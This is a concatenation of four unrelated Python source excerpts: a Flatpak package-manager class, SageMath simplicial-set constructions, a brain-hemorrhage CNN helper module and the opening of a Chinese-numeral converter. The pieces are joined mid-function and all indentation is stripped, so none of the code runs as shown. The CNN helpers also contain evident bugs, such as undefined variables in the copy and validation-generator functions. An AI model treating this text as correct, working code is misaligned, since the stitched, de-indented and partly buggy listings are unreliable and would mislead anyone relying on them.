model.updates_ignored = True
return SearchResult(models, None, len(models))
def downgrade(self, pkg: FlatpakApplication, root_password: str, watcher: ProcessWatcher) -> bool:
if not self._make_exports_dir(watcher):
return False
watcher.change_progress(10)
watcher.change_substatus(self.i18n['flatpak.downgrade.commits'])
history = self.get_history(pkg)
# downgrade is not possible if the app current commit in the first one:
if history.pkg_status_idx == len(history.history) - 1:
watcher.show_message(self.i18n['flatpak.downgrade.impossible.title'],
self.i18n['flatpak.downgrade.impossible.body'].format(bold(pkg.name)),
MessageType.ERROR)
return False
commit = history.history[history.pkg_status_idx + 1]['commit']
watcher.change_substatus(self.i18n['flatpak.downgrade.reverting'])
watcher.change_progress(50)
success, _ = ProcessHandler(watcher).handle_simple(flatpak.downgrade(pkg.ref,
commit,
pkg.installation,
root_password))
watcher.change_progress(100)
return success
def clean_cache_for(self, pkg: FlatpakApplication):
super(FlatpakManager, self).clean_cache_for(pkg)
self.api_cache.delete(pkg.id)
def upgrade(self, requirements: UpgradeRequirements, root_password: str, watcher: ProcessWatcher) -> bool:
flatpak_version = flatpak.get_version()
if not self._make_exports_dir(watcher):
return False
for req in requirements.to_upgrade:
watcher.change_status("{} {} ({})...".format(self.i18n['manage_window.status.upgrading'], req.pkg.name, req.pkg.version))
related, deps = False, False
ref = req.pkg.ref
if req.pkg.partial and flatpak_version < '1.5':
related, deps = True, True
ref = req.pkg.base_ref
try:
res, _ = ProcessHandler(watcher).handle_simple(flatpak.update(app_ref=ref,
installation=req.pkg.installation,
related=related,
deps=deps))
watcher.change_substatus('')
if not res:
self.logger.warning("Could not upgrade '{}'".format(req.pkg.id))
return False
except:
watcher.change_substatus('')
self.logger.error("An error occurred while upgrading '{}'".format(req.pkg.id))
traceback.print_exc()
return False
watcher.change_substatus('')
return True
def uninstall(self, pkg: FlatpakApplication, root_password: str, watcher: ProcessWatcher, disk_loader: DiskCacheLoader) -> TransactionResult:
if not self._make_exports_dir(watcher):
return TransactionResult.fail()
uninstalled, _ = ProcessHandler(watcher).handle_simple(flatpak.uninstall(pkg.ref, pkg.installation))
if uninstalled:
if self.suggestions_cache:
self.suggestions_cache.delete(pkg.id)
self.revert_ignored_update(pkg)
return TransactionResult(success=True, installed=None, removed=[pkg])
return TransactionResult.fail()
def get_info(self, app: FlatpakApplication) -> dict:
if app.installed:
version = flatpak.get_version()
id_ = app.base_id if app.partial and version < '1.5' else app.id
app_info = flatpak.get_app_info_fields(id_, app.branch, app.installation)
if app.partial and version < '1.5':
app_info['id'] = app.id
app_info['ref'] = app.ref
app_info['name'] = app.name
app_info['type'] = 'runtime' if app.runtime else 'app'
app_info['description'] = strip_html(app.description) if app.description else ''
if app.installation:
app_info['installation'] = app.installation
if app_info.get('installed'):
app_info['installed'] = app_info['installed'].replace('?', ' ')
return app_info
else:
res = self.http_client.get_json('{}/apps/{}'.format(FLATHUB_API_URL, app.id))
if res:
if res.get('categories'):
res['categories'] = [c.get('name') for c in res['categories']]
for to_del in ('screenshots', 'iconMobileUrl', 'iconDesktopUrl'):
if res.get(to_del):
del res[to_del]
for to_strip in ('description', 'currentReleaseDescription'):
if res.get(to_strip):
res[to_strip] = strip_html(res[to_strip])
for to_date in ('currentReleaseDate', 'inStoreSinceDate'):
if res.get(to_date):
try:
res[to_date] = datetime.strptime(res[to_date], DATE_FORMAT)
except:
self.context.logger.error('Could not convert date string {} as {}'.format(res[to_date], DATE_FORMAT))
pass
return res
else:
return {}
def get_history(self, pkg: FlatpakApplication) -> PackageHistory:
pkg.commit = flatpak.get_commit(pkg.id, pkg.branch, pkg.installation)
commits = flatpak.get_app_commits_data(pkg.ref, pkg.origin, pkg.installation)
status_idx = 0
commit_found = False
if pkg.commit is None and len(commits) > 1 and commits[0]['commit'] == '(null)':
del commits[0]
pkg.commit = commits[0]
commit_found = True
if not commit_found:
for idx, data in enumerate(commits):
if data['commit'] == pkg.commit:
status_idx = idx
commit_found = True
break
if not commit_found and pkg.commit and commits[0]['commit'] == '(null)':
commits[0]['commit'] = pkg.commit
return PackageHistory(pkg=pkg, history=commits, pkg_status_idx=status_idx)
def _make_exports_dir(self, watcher: ProcessWatcher) -> bool:
if not os.path.exists(EXPORTS_PATH):
self.logger.info("Creating dir '{}'".format(EXPORTS_PATH))
watcher.print('Creating dir {}'.format(EXPORTS_PATH))
try:
Path(EXPORTS_PATH).mkdir(parents=True, exist_ok=True)
except:
watcher.print('Error while creating the directory {}'.format(EXPORTS_PATH))
return False
return True
def install(self, pkg: FlatpakApplication, root_password: str, disk_loader: DiskCacheLoader, watcher: ProcessWatcher) -> TransactionResult:
config = read_config()
install_level = config['installation_level']
if install_level is not None:
self.logger.info("Default Flaptak installation level defined: {}".format(install_level))
if install_level not in ('user', 'system'):
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['flatpak.install.bad_install_level.body'].format(field=bold('installation_level'),
file=bold(CONFIG_FILE)),
type_=MessageType.ERROR)
return TransactionResult(success=False, installed=[], removed=[])
pkg.installation = install_level
else:
user_level = watcher.request_confirmation(title=self.i18n['flatpak.install.install_level.title'],
body=self.i18n['flatpak.install.install_level.body'].format(bold(pkg.name)),
confirmation_label=self.i18n['no'].capitalize(),
deny_label=self.i18n['yes'].capitalize())
pkg.installation = 'user' if user_level else 'system'
remotes = flatpak.list_remotes()
handler = ProcessHandler(watcher)
if pkg.installation == 'user' and not remotes['user']:
handler.handle_simple(flatpak.set_default_remotes('user'))
elif pkg.installation == 'system' and not remotes['system']:
if user.is_root():
handler.handle_simple(flatpak.set_default_remotes('system'))
else:
user_password, valid = watcher.request_root_password()
if not valid:
watcher.print('Operation aborted')
return TransactionResult(success=False, installed=[], removed=[])
else:
if not handler.handle_simple(flatpak.set_default_remotes('system', user_password))[0]:
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['flatpak.remotes.system_flathub.error'],
type_=MessageType.ERROR)
watcher.print("Operation cancelled")
return TransactionResult(success=False, installed=[], removed=[])
# retrieving all installed so it will be possible to know the additional installed runtimes after the operation succeeds
flatpak_version = flatpak.get_version()
installed = flatpak.list_installed(flatpak_version)
installed_by_level = {'{}:{}:{}'.format(p['id'], p['name'], p['branch']) for p in installed if p['installation'] == pkg.installation} if installed else None
if not self._make_exports_dir(handler.watcher):
return TransactionResult(success=False, installed=[], removed=[])
installed, output = handler.handle_simple(flatpak.install(str(pkg.id), pkg.origin, pkg.installation))
if not installed and 'error: No ref chosen to resolve matches' in output:
ref_opts = RE_INSTALL_REFS.findall(output)
if ref_opts and len(ref_opts) > 1:
view_opts = [InputOption(label=o, value=o.strip()) for o in ref_opts if o]
ref_select = SingleSelectComponent(type_=SelectViewType.RADIO, options=view_opts, default_option=view_opts[0], label='')
if watcher.request_confirmation(title=self.i18n['flatpak.install.ref_choose.title'],
body=self.i18n['flatpak.install.ref_choose.body'].format(bold(pkg.name)),
components=[ref_select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
ref = ref_select.get_selected()
installed, output = handler.handle_simple(flatpak.install(ref, pkg.origin, pkg.installation))
pkg.ref = ref
pkg.runtime = 'runtime' in ref
else:
watcher.print('Aborted by the user')
return TransactionResult.fail()
else:
return TransactionResult.fail()
if installed:
try:
fields = flatpak.get_fields(str(pkg.id), pkg.branch, ['Ref', 'Branch'])
if fields:
pkg.ref = fields[0]
pkg.branch = fields[1]
except:
traceback.print_exc()
if installed:
new_installed = [pkg]
current_installed = flatpak.list_installed(flatpak_version)
current_installed_by_level = [p for p in current_installed if p['installation'] == pkg.installation] if current_installed else None
if current_installed_by_level and (not installed_by_level or len(current_installed_by_level) > len(installed_by_level) + 1):
pkg_key = '{}:{}:{}'.format(pkg.id, pkg.name, pkg.branch)
net_available = internet.is_available()
for p in current_installed_by_level:
current_key = '{}:{}:{}'.format(p['id'], p['name'], p['branch'])
if current_key != pkg_key and (not installed_by_level or current_key not in installed_by_level):
new_installed.append(self._map_to_model(app_json=p, installed=True,
disk_loader=disk_loader, internet=net_available))
return TransactionResult(success=installed, installed=new_installed, removed=[])
else:
return TransactionResult.fail()
def is_enabled(self):
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
return flatpak.is_installed()
def requires_root(self, action: str, pkg: FlatpakApplication):
return action == 'downgrade' and pkg.installation == 'system'
def prepare(self, task_manager: TaskManager, root_password: str, internet_available: bool):
Thread(target=read_config, args=(True,), daemon=True).start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
updates = []
installed = self.read_installed(None, internet_available=internet_available).installed
to_update = [p for p in installed if | |
RPoo = simplicial_sets.RealProjectiveSpace(Infinity)
sage: latex(S2.product(RPoo, S2))
S^{2} \times RP^{\infty} \times S^{2}
"""
return ' \\times '.join([latex(X) for X in self._factors])
class ProductOfSimplicialSets_finite(ProductOfSimplicialSets, PullbackOfSimplicialSets_finite):
r"""
The product of finite simplicial sets.
When the factors are all finite, there are more methods available
for the resulting product, as compared to products with infinite
factors: projection maps, the wedge as a subcomplex, and the fat
wedge as a subcomplex. See :meth:`projection_map`,
:meth:`wedge_as_subset`, and :meth:`fat_wedge_as_subset`
"""
def __init__(self, factors=None):
r"""
Return the product of finite simplicial sets.
See :class:`ProductOfSimplicialSets` for more information.
EXAMPLES::
sage: from sage.topology.simplicial_set import AbstractSimplex, SimplicialSet
sage: v = AbstractSimplex(0, name='v')
sage: e = AbstractSimplex(1)
sage: X = SimplicialSet({e: (v, v)})
sage: W = X.product(X, X)
sage: W.homology()
{0: 0, 1: Z x Z x Z, 2: Z x Z x Z, 3: Z}
sage: W.is_pointed()
False
sage: X = X.set_base_point(v)
sage: w = AbstractSimplex(0, name='w')
sage: f = AbstractSimplex(1)
sage: Y = SimplicialSet({f: (v,w)}, base_point=w)
sage: Z = Y.product(X)
sage: Z.is_pointed()
True
sage: Z.base_point()
(w, v)
"""
PullbackOfSimplicialSets_finite.__init__(self, [space.constant_map()
for space in factors])
self._factors = tuple([f.domain() for f in self._maps])
def projection_map(self, i):
"""
Return the map projecting onto the $i$-th factor.
INPUT:
- ``i`` -- integer, the index of the projection map
EXAMPLES::
sage: T = simplicial_sets.Torus()
sage: f_0 = T.projection_map(0)
sage: f_1 = T.projection_map(1)
sage: m_0 = f_0.induced_homology_morphism().to_matrix(1) # matrix in dim 1
sage: m_1 = f_1.induced_homology_morphism().to_matrix(1)
sage: m_0.rank()
1
sage: m_0 == m_1
False
"""
return self.structure_map(i)
def wedge_as_subset(self):
"""
Return the wedge as a subsimplicial set of this product of pointed
simplicial sets.
This will raise an error if any factor is not pointed.
EXAMPLES::
sage: from sage.topology.simplicial_set import AbstractSimplex, SimplicialSet
sage: v = AbstractSimplex(0, name='v')
sage: e = AbstractSimplex(1, name='e')
sage: w = AbstractSimplex(0, name='w')
sage: f = AbstractSimplex(1, name='f')
sage: X = SimplicialSet({e: (v, v)}, base_point=v)
sage: Y = SimplicialSet({f: (w, w)}, base_point=w)
sage: P = X.product(Y)
sage: W = P.wedge_as_subset()
sage: W.nondegenerate_simplices()
[(v, w), (e, s_0 w), (s_0 v, f)]
sage: W.homology()
{0: 0, 1: Z x Z}
"""
basept_factors = [sset.base_point() for sset in self.factors()]
to_factors = dict((v,k) for k,v in self._translation)
simps = []
for x in self.nondegenerate_simplices():
simplices = to_factors[x]
not_base_pt = 0
for sigma, star in zip(simplices, basept_factors):
if not_base_pt > 1:
continue
if sigma[0].nondegenerate() != star:
not_base_pt += 1
if not_base_pt <= 1:
simps.append(x)
return self.subsimplicial_set(simps)
def fat_wedge_as_subset(self):
"""
Return the fat wedge as a subsimplicial set of this product of
pointed simplicial sets.
The fat wedge consists of those terms where at least one
factor is the base point. Thus with two factors this is the
ordinary wedge, but with more factors, it is larger.
EXAMPLES::
sage: S1 = simplicial_sets.Sphere(1)
sage: X = S1.product(S1, S1)
sage: W = X.fat_wedge_as_subset()
sage: W.homology()
{0: 0, 1: Z x Z x Z, 2: Z x Z x Z}
"""
basept_factors = [sset.base_point() for sset in self.factors()]
to_factors = {v: k for k, v in self._translation}
simps = []
for x in self.nondegenerate_simplices():
simplices = to_factors[x]
combined = zip(simplices, basept_factors)
if any(sigma[0] == pt for (sigma, pt) in combined):
simps.append(x)
return self.subsimplicial_set(simps)
class PushoutOfSimplicialSets(SimplicialSet_arbitrary, UniqueRepresentation):
@staticmethod
def __classcall_private__(cls, maps=None, vertex_name=None):
"""
TESTS::
sage: from sage.topology.simplicial_set_constructions import PushoutOfSimplicialSets
sage: S2 = simplicial_sets.Sphere(2)
sage: one = S2.Hom(S2).identity()
sage: PushoutOfSimplicialSets([one, one]) == PushoutOfSimplicialSets((one, one))
True
"""
if maps:
return super(PushoutOfSimplicialSets, cls).__classcall__(cls, maps=tuple(maps),
vertex_name=vertex_name)
return super(PushoutOfSimplicialSets, cls).__classcall__(cls, vertex_name=vertex_name)
def __init__(self, maps=None, vertex_name=None):
r"""
Return the pushout obtained from the morphisms ``maps``.
INPUT:
- ``maps`` -- a list or tuple of morphisms of simplicial sets
- ``vertex_name`` -- optional, default ``None``
If only a single map `f: X \to Y` is given, then return
`Y`. If no maps are given, return the empty simplicial
set. Otherwise, given a simplicial set `X` and maps `f_i: X
\to Y_i` for `0 \leq i \leq m`, construct the pushout `P`: see
:wikipedia:`Pushout_(category_theory)`. This is constructed as
pushouts of sets for each set of `n`-simplices, so `P_n` is
the disjoint union of the sets `(Y_i)_n`, with elements
`f_i(x)` identified for `n`-simplex `x` in `X`.
Simplices in the pushout are given names as follows: if a
simplex comes from a single `Y_i`, it inherits its
name. Otherwise it must come from a simplex (or several) in
`X`, and then it inherits one of those names, and it should be
the first alphabetically. For example, if vertices `v`, `w`,
and `z` in `X` are glued together, then the resulting vertex
in the pushout will be called `v`.
Base points are taken care of automatically: if each of the
maps `f_i` is pointed, so is the pushout. If `X` is a point or
if `X` is nonempty and any of the spaces `Y_i` is a point, use
those for the base point. In all of these cases, if
``vertex_name`` is ``None``, generate the name of the base
point automatically; otherwise, use ``vertex_name`` for its
name.
In all other cases, the pushout is not pointed.
EXAMPLES::
sage: from sage.topology.simplicial_set import AbstractSimplex, SimplicialSet
sage: v = AbstractSimplex(0, name='v')
sage: a = AbstractSimplex(0, name='a')
sage: b = AbstractSimplex(0, name='b')
sage: c = AbstractSimplex(0, name='c')
sage: e0 = AbstractSimplex(1, name='e_0')
sage: e1 = AbstractSimplex(1, name='e_1')
sage: e2 = AbstractSimplex(1, name='e_2')
sage: X = SimplicialSet({e2: (b, a)})
sage: Y0 = SimplicialSet({e2: (b,a), e0: (c,b), e1: (c,a)})
sage: Y1 = simplicial_sets.Simplex(0)
sage: f0_data = {a:a, b:b, e2: e2}
sage: v = Y1.n_cells(0)[0]
sage: f1_data = {a:v, b:v, e2:v.apply_degeneracies(0)}
sage: f0 = X.Hom(Y0)(f0_data)
sage: f1 = X.Hom(Y1)(f1_data)
sage: P = X.pushout(f0, f1)
sage: P.nondegenerate_simplices()
[a, c, e_0, e_1]
There are defining maps `f_i: X \to Y_i` and structure maps
`\bar{f}_i: Y_i \to P`; the latter are only implemented in
Sage when each `Y_i` is finite. ::
sage: P.defining_map(0) == f0
True
sage: P.structure_map(1)
Simplicial set morphism:
From: 0-simplex
To: Pushout of maps:
Simplicial set morphism:
From: Simplicial set with 3 non-degenerate simplices
To: Simplicial set with 6 non-degenerate simplices
Defn: [a, b, e_2] --> [a, b, e_2]
Simplicial set morphism:
From: Simplicial set with 3 non-degenerate simplices
To: 0-simplex
Defn: Constant map at (0,)
Defn: Constant map at a
sage: P.structure_map(0).domain() == Y0
True
sage: P.structure_map(0).codomain() == P
True
An inefficient way of constructing a suspension for an
unpointed set: take the pushout of two copies of the inclusion
map `X \to CX`::
sage: T = simplicial_sets.Torus()
sage: T = T.unset_base_point()
sage: CT = T.cone()
sage: inc = CT.base_as_subset().inclusion_map()
sage: P = T.pushout(inc, inc)
sage: P.homology()
{0: 0, 1: 0, 2: Z x Z, 3: Z}
sage: len(P.nondegenerate_simplices())
20
It is more efficient to construct the suspension as the
quotient `CX/X`::
sage: len(CT.quotient(CT.base_as_subset()).nondegenerate_simplices())
8
It is more efficient still if the original simplicial set has
a base point::
sage: T = simplicial_sets.Torus()
sage: len(T.suspension().nondegenerate_simplices())
6
sage: S1 = simplicial_sets.Sphere(1)
sage: pt = simplicial_sets.Point()
sage: bouquet = pt.pushout(S1.base_point_map(), S1.base_point_map(), S1.base_point_map())
sage: bouquet.homology(1)
Z x Z x Z
"""
# Import this here to prevent circular imports.
from sage.topology.simplicial_set_morphism import SimplicialSetMorphism
if maps and any(not isinstance(f, SimplicialSetMorphism) for f in maps):
raise ValueError('the maps must be morphisms of simplicial sets')
Cat = SimplicialSets()
if maps:
if all(f.codomain().is_finite() for f in maps):
Cat = Cat.Finite()
if all(f.is_pointed() for f in maps):
Cat = Cat.Pointed()
Parent.__init__(self, category=Cat)
self._maps = maps
self._n_skeleton = (-1, Empty())
self._vertex_name = vertex_name
def n_skeleton(self, n):
"""
Return the `n`-skeleton of this simplicial set.
That is, the simplicial set generated by all nondegenerate
simplices of dimension at most `n`.
INPUT:
- ``n`` -- the dimension
The `n`-skeleton of the pushout is computed as the pushout
of the `n`-skeleta of the component simplicial sets.
EXAMPLES::
sage: B = simplicial_sets.ClassifyingSpace(groups.misc.MultiplicativeAbelian([2]))
sage: K = B.n_skeleton(3)
sage: Q = K.pushout(K.inclusion_map(), K.constant_map())
sage: Q.n_skeleton(5).homology()
{0: 0, 1: 0, 2: 0, 3: 0, 4: Z, 5: Z}
Of course, computing the `n`-skeleton and then taking homology
need not | |
<filename>Predicting_of_Brain_Hemorr_using_CNN_Module.py<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# # FUNCTIONS AND CLASSES FOR AL FINAL PROJECT
# In[1]:
import pydicom as dicom
import os
import cv2
#import PIL # optional
import sys, os, pydicom, shutil
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import itertools
import pandas as pd
from itertools import combinations
import tensorflow as tf
#tf.enable_eager_execution()
from sklearn.preprocessing import OneHotEncoder
from keras.models import Sequential
from keras.models import Model
from keras_preprocessing.image import ImageDataGenerator
from keras.layers import Input,concatenate, multiply, Reshape, Lambda, Conv2D, MaxPooling2D, Dense, Activation, Flatten, Dropout, BatchNormalization, AveragePooling2D,ZeroPadding2D
from keras import regularizers, optimizers
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.neighbors import KernelDensity
# # Functions
# In[2]:
# make it True if you want in PNG format
def convert_dicom(folder_path_from, folder_path_to, PNG = False):
""" Converts dicom image format to jpg or png
folder_path_from -- path to get images from for conversion
folder_path_to -- path to copy imgs to
"""
images_path = os.listdir(folder_path_from)
for n, image in enumerate(images_path):
ds = dicom.dcmread(os.path.join(folder_path_from, image))
pixel_array_numpy = ds.pixel_array
if PNG == False:
image = image.replace('.dcm', '.jpg')
else:
image = image.replace('.dcm', '.png')
cv2.imwrite(os.path.join(folder_path_to, image), pixel_array_numpy)
#os.remove(os.path.join(folder_path_from, image))
return None
def remove_damage_img(df1, path):
"""remove damage image(s) that couldn't be read by pydicom or images that
are not 512, 512 from dataframe.
returns: tuple of (number of images remove, modified df)
Warning: run function only once.
"""
df = df1.copy()
dcm_img_path = [] # list to store path to images
w = 512
l = 512
num_of_damage_img = 0
for file in os.listdir(path):
if file.endswith(".dcm"):
dcm_img_path.append(file)
dcm_img_path = [os.path.join(path, file) for file in dcm_img_path]
for image in dcm_img_path:
# delete images the program cannot read
try:
im = pydicom.read_file(image).pixel_array
except:
#os.remove(image)
df.drop(df[df['ID'] == image.split('//')[-1]].index.tolist() , inplace = True)
if im.shape != (w, l):
df.drop(df[df['ID'] == image.split('//')[-1]].index.tolist() , inplace = True)
return df
def randomly_select_img(df, size_per_cls):
"""randomly select image index from image dataframe and return a list
of indices to slice dataframe. It selects images to balance the classes
"""
# list to hold the randomly generated index
index_list = []
c = {'epidural' , 'intraparenchymal', 'intraventricular', 'subarachnoid', 'subdural'}
# the number of combinations
for i in range(1, 6):
comb = combinations(df.columns[2:], i)
for j in comb: # run combination
hold_format = []
no_disease = c.difference(set(j))
for no_dis in no_disease:
hold_format.append([no_dis, '==', 0])
for dis in set(j):
hold_format.append([dis, '!=', 0])
sql = """({} {} {}) & ({} {} {}) & ({} {} {}) & ({} {} {}) & ({} {} {})
""".format(*itertools.chain.from_iterable(hold_format))
try:
result = np.random.choice(df.query(sql).index.tolist(), size = size_per_cls, replace = False)
# if len(df.filter) < size_per_cls return the whole index
except ValueError:
result = df.query(sql).index.tolist()
# add indices to kindex list
for res in result:
index_list.append(res)
#continue
# add index of with no disease
result = np.random.choice(df.query('any == 0').index.tolist(), size = len(index_list), replace = False)
for res in result:
index_list.append(res)
return index_list
def copy_img_to_folder(df, path_sou, path_des):
"""copy images(filename) in dataframe to a destinated folder denoted
by path_des. Assumes that the column to extract the filenames from
is 'ID'
"""
for file in df["ID"]:
shutil.copyfile(os.path.join(path, file), os.path.join(path_des, file))
return None
def train_test_split_image(mainPath, test_size):
"""Creates subfolders for training and test split for image data set
by randomly drawing without replacement from each class/label.
Input: mainPath -- path to the main/parent folder of the image data
test_size -- percentage of image to split for test
Return: paths to the parent folders of the image test data and image train data
These are the paths you give to image generator (keras)
Warning: This function creates a copy of the image data so watch out if you have lots of images.
You might also want to delete the parent folders created by this function after you're done with
this assignment (since it creates a duplicate of images you already have).
This is how you call the function:
X_train_path, X_test_path = train_test_split_image("your_path", test_size = 0.2)
"""
import os
import shutil
# number of folders in mainPath
num_classes = len(os.listdir(mainPath))
# Labels or class or taget list
labels = os.listdir(mainPath)
# main folder names
folder_name_train = mainPath.split('\\')[-1:][0] + '_train'
folder_name_test = mainPath.split('\\')[-1:][0] + '_test'
# main folder path
train_path = mainPath.split('\\')[:-1]
train_path.append(folder_name_train)
test_path = mainPath.split('\\')[:-1]
test_path.append(folder_name_test)
# create path name
train_path = '\\'.join(train_path)
test_path = '\\'.join(test_path)
# create main folders for train and test data
for path in [train_path, test_path]:
success = False
if not os.path.exists(path):
os.mkdir(path)
success = True
else:
print("Directory " , path , " already exists")
# create subfolders under the folders just created
if success:
for class_label in labels:
os.mkdir(train_path +'\\'+ class_label)
os.mkdir(test_path +'\\'+ class_label)
# A dict to hold the number of images to extract for test size -- key:class, value: test_size
num_test_images = {}
for class_name in labels:
images = os.listdir(mainPath +'\\'+ class_name)
count = len(images)
num_test_images[class_name] = int(count * test_size)
# randomly pick images for test without replacement
test_set = np.random.choice(images, size = num_test_images[class_name], replace = False)
# copy images to train and test folder
# copy to test folder
for i in test_set:
shutil.copy(src = mainPath +'\\'+ class_name + '\\' + i , dst = test_path +'\\' + class_name + '\\' + i )
# copy remaining images to training folder
for j in set(images).difference(set(test_set)):
shutil.copy(src = mainPath +'\\'+ class_name + '\\' + j , dst = train_path +'\\'+ class_name + '\\' + j )
return train_path, test_path
def onehot(df, columns = ['no_disease', 'disease']):
"""one hot encodes a column vector of 1s and 0s
returns None type. Works on the dataframe as not object
"""
encode = OneHotEncoder(categories='auto')
y_onehot = encode.fit_transform(df.loc[:, 'any'].values.reshape(-1,1))
y_onehot = pd.DataFrame(y_onehot.toarray()).astype(int)
y_onehot.columns = columns
for i in columns:
df[i] = y_onehot[i]
return None
def graph_wight_violin(dict_wght, fig_size=(15,11)):
"""Graph two violin plots: one for the weights and another for bias
df_weight -- dictionary of weights and biases
Returns: plots
"""
sns.set(rc={'figure.figsize':fig_size})
sns.set_context("poster")
dict_wght_df = pd.DataFrame(dict([ (k,pd.Series(v)) for k,v in dict_wght.items()]))
sns.set()#style="whitegrid")
ax = sns.violinplot(x="Groups", y="Values", data=dict_wght_df.melt(var_name='Groups', value_name='Values'), inner='box')
ax.set_title('Distribution of Weights and Biases')
return plt.show()
# In[3]:
#path_folder = r"D:\ai_final_train_img_2"
#path_folder_to = r"D:\ai_final_train_img_2_jpg"
#df_path = r"D:\df_2"
#convert_dicom(path_folder, path_folder_to)
# you are only using 2 columns
#df = pd.read_excel(df_path, usecols = ['ID', 'any'], dtypes = {'ID':str, 'any':int})
# # Classes
# In[4]:
class image_gen_ai: #( tf.keras.preprocessing.image):
def __init__(self, image_size, batch, class_mod):
self.target_size = image_size
self.batch_size = batch
self.class_mode = class_mod
def create_train_gen(self, df, path, y_col = ['no_disease', 'disease']):
train = ImageDataGenerator(rescale = 1./255,
shear_range = 0.2,
zoom_range = 0.2,
rotation_range = 15,
width_shift_range = 0.2,
height_shift_range= 0.2,
horizontal_flip = True
)
train_gen = train.flow_from_dataframe(
dataframe = df,
directory = path,
x_col = "ID",
y_col = y_col,
batch_size = self.batch_size,
seed = 42,
shuffle = True,
class_mode = self.class_mode,
target_size= self.target_size,
validate_filenames=False
)
return train_gen
def train_gen_model2(self, df, path, y_col = ['epidural','intraparenchymal', 'intraventricular','subarachnoid','subdural']):
train = ImageDataGenerator(rescale = 1./255,
shear_range = 0.2,
zoom_range = 0.2,
rotation_range = 15,
width_shift_range = 0.2,
height_shift_range= 0.2,
horizontal_flip = True
)
train_gen2 = train.flow_from_dataframe(
dataframe = df,
directory = path,
x_col = "ID",
y_col = y_col,
batch_size = self.batch_size,
seed = 42,
shuffle = False,
class_mode = self.class_mode,
target_size= self.target_size,
validate_filenames=False
)
return train_gen2
def create_val_gen(self, df, path, y_col = ['no_disease', 'disease']):
val = ImageDataGenerator(rescale = 1./255,
shear_range = 0.2,
zoom_range = 0.2,
rotation_range = 15,
width_shift_range = 0.2,
height_shift_range= 0.2,
horizontal_flip = True
)
val_gen = train.flow_from_dataframe(
dataframe = df,
directory = path,
x_col = "ID",
y_col = y_col,
batch_size = self.batch_size,
shuffle = True,
class_mode = self.class_mode,
target_size= self.target_size,
validate_filenames=False
)
return val_gen
def create_test_gen(self, df, path):
test = ImageDataGenerator(rescale=1./255)
test_gen = test.flow_from_dataframe(
dataframe = | |
<reponame>begeekmyfriend/cn-text-normalizer
# coding: utf-8
# The MIT License (MIT)
# Copyright (c) 2015 by <NAME> (<EMAIL>)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
''' Chinese number <=> int/float conversion methods '''
__author__ = '<NAME> <<EMAIL>>; <NAME> <<EMAIL>>'
__version__ = '2018-06-01'
if 'constants': # for code folding
CHINESE_DIGIS = u'零一二三四五六七八九'
BIG_CHINESE_DIGIS_SIMPLIFIED = u'零壹贰叁肆伍陆柒捌玖'
BIG_CHINESE_DIGIS_TRADITIONAL = u'零壹貳參肆伍陸柒捌玖'
SMALLER_BIG_CHINESE_UNITS_SIMPLIFIED = u'十百千万'
SMALLER_BIG_CHINESE_UNITS_TRADITIONAL = u'拾佰仟萬'
LARGER_CHINESE_NUMERING_UNITS_SIMPLIFIED = u'亿兆京垓秭穰沟涧正载'
LARGER_CHINESE_NUMERING_UNITS_TRADITIONAL = u'億兆京垓秭穰溝澗正載'
SMALLER_CHINESE_NUMERING_UNITS_SIMPLIFIED = u'十百千万'
SMALLER_CHINESE_NUMERING_UNITS_TRADITIONAL = u'拾佰仟萬'
ZERO_ALT = u'〇'
TWO_ALTS = [u'两', u'兩']
POSITIVE = [u'正', u'正']
NEGATIVE = [u'负', u'負']
POINT = [u'点', u'點']
NUMBERING_TYPES = ['low', 'mid', 'high']
if 'class definitions': # for code folding
class ChineseChar(object):
"""
Chinese charactors.
Each has simplified and traditional strings,
e.g. simplified = '负', traditional = '負'
When converted to string, it will shows the simplified string or traditional string or None.
"""
def __init__(self, simplified, traditional):
self.simplified = simplified
self.traditional = traditional
self.__repr__ = self.__str__
def __str__(self):
return self.simplified or self.traditional or None
def __repr__(self):
return self.__str__()
class ChineseNumberUnit(ChineseChar):
"""
Chinese number unit.number
Each of it is an ChineseChar with additional big type strings.
e.g. '陆' and '陸'
"""
def __init__(self, power, simplified, traditional, big_s, big_t):
super(ChineseNumberUnit, self).__init__(simplified, traditional)
self.power = power
self.big_s = big_s
self.big_t = big_t
def __str__(self):
return '10^{}'.format(self.power)
@classmethod
def create(cls, index, value, numbering_type=NUMBERING_TYPES[1], small_unit=False):
if small_unit:
return ChineseNumberUnit(power=index + 1,
simplified=value[0], traditional=value[1], big_s=value[1], big_t=value[1])
elif numbering_type == NUMBERING_TYPES[0]:
return ChineseNumberUnit(power=index + 8,
simplified=value[0], traditional=value[1], big_s=value[0], big_t=value[1])
elif numbering_type == NUMBERING_TYPES[1]:
return ChineseNumberUnit(power=(index + 2) * 4,
simplified=value[0], traditional=value[1], big_s=value[0], big_t=value[1])
elif numbering_type == NUMBERING_TYPES[2]:
return ChineseNumberUnit(power=pow(2, index + 3),
simplified=value[0], traditional=value[1], big_s=value[0], big_t=value[1])
else:
raise ValueError(
'Counting type should be in {0} ({1} provided).'.format(NUMBERING_TYPES, numbering_type))
class ChineseNumberDigi(ChineseChar):
